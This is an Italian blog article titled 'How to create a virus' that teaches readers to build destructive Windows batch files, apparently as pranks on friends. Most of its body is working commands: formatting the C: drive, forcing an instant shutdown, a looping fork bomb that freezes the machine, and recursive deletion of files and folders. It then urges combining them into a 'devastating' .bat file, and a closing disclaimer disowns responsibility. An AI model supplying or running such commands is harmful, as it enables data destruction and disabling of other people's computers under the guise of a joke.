Come creare un virus

0
3018

Se state leggendo questo articolo sicuramente vi aspetterete di imparare come creare  virus, magari per fare uno scherzo ad un amico o solamente per curiosità. Bene, la  concezione più diffusa dei virus è quella di un programma, video o brano, in cui,  dentro, si cela  un programma, creato per l’unico scopo di creare danni. Se pensate  questo dei virus  state sbagliando, la maggior parte dei virus in circolazione sono  virus creati tramite  file batch (.bat). Questi sostituiscono il terminale compiendo  semplici azioni  che potreste fare anche voi con l’interfaccia. Ma vediamo quali sono i più popolari virus in circolazione e come crearli. Create un file .txt e scriveteci sopra. In base a cosa scriverete la macchina seguirà delle indicazioni che eseguirà nel momento in cui voi rinominerete il virus completato in .bat. Potrei non esser stato chiaro per alcuni quindi vediamo insieme come fare.

Creiamo un file di testo e scriviamo sopra delle indicazioni da dare alla nostra macchina. Ne esistono molteplici e una volta imparate le basi potrete sbizzarrirvi a creare virus. Le principali indicazioni sono:

Per formattare un PC:

@FORMAT all C: /AUTOTEST /Q /U

Per spegnere il PC:

shutdown -s -t 1

Per impallare il PC:

:1

start

goto 1

Per cancellare qualunque file o cartella:

@ECHO OFF
DEL /Q “C:\Test\*.*”
FOR /D %%i IN (“C:\Test\*”) DO RD /S /Q “%%i” DEL /Q “C:\Test\*.*”

[In questo caso sostituite i campi tra le “” con il percorso del file che volete eliminare]

Combinate tutti questi elementi per creare un virus più o meno devastante e, infine, salvate rinominando il file in .bat (cioè “:nomedelfile.bat”, ad esempio).

Questo articolo è stato fatto a scopo informativo pertanto non ci prendiamo responsabilità di ciò che farete con queste informazioni.

Non perdere neanche un trucco scriviti alla newsletter ed unisciti ai nostri 207 iscritti.

BlogNews

Nessun Commento